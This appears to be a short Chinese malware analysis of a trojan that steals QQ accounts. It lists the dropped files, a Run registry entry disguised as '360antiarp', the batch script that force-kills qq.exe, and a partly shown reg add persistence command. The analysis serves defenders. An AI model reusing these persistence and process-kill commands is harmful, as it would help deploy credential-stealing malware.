1、文件运行后会释放以下文件
%Windir%\dp1.fne (易语言支持库无危害)
%Windir%\mm1.jpg (图片文件无危害)
%Windir%\2.bat (强行结束QQ进程)
%Windir%\svhost.exe (盗QQ木马主文件)
2、添加注册表病毒启动项
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\360antiarp
值: 字符串: "%Windir%\svhost.exe"
描述: 添加注册表项,以达到随机启动的目的
3、运行批处理文件一旦运行后将强行结束QQ进程:
@echo off
if "%~1"=="" start /min "" "%~0" h&exit
@taskkill /f /im qq.exe
Exit
病毒文件为易语言编写,图标伪装成360安全卫士软件,采用了vmprotect加密工具进行了加密处理,病毒文件运行后释放run.cmd到%System32%目录下,调用run.cmd文件先使用批处理添加注册表启动项:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 360antiarp /t REG_SZ /d "%Windir%\svhost.exe" |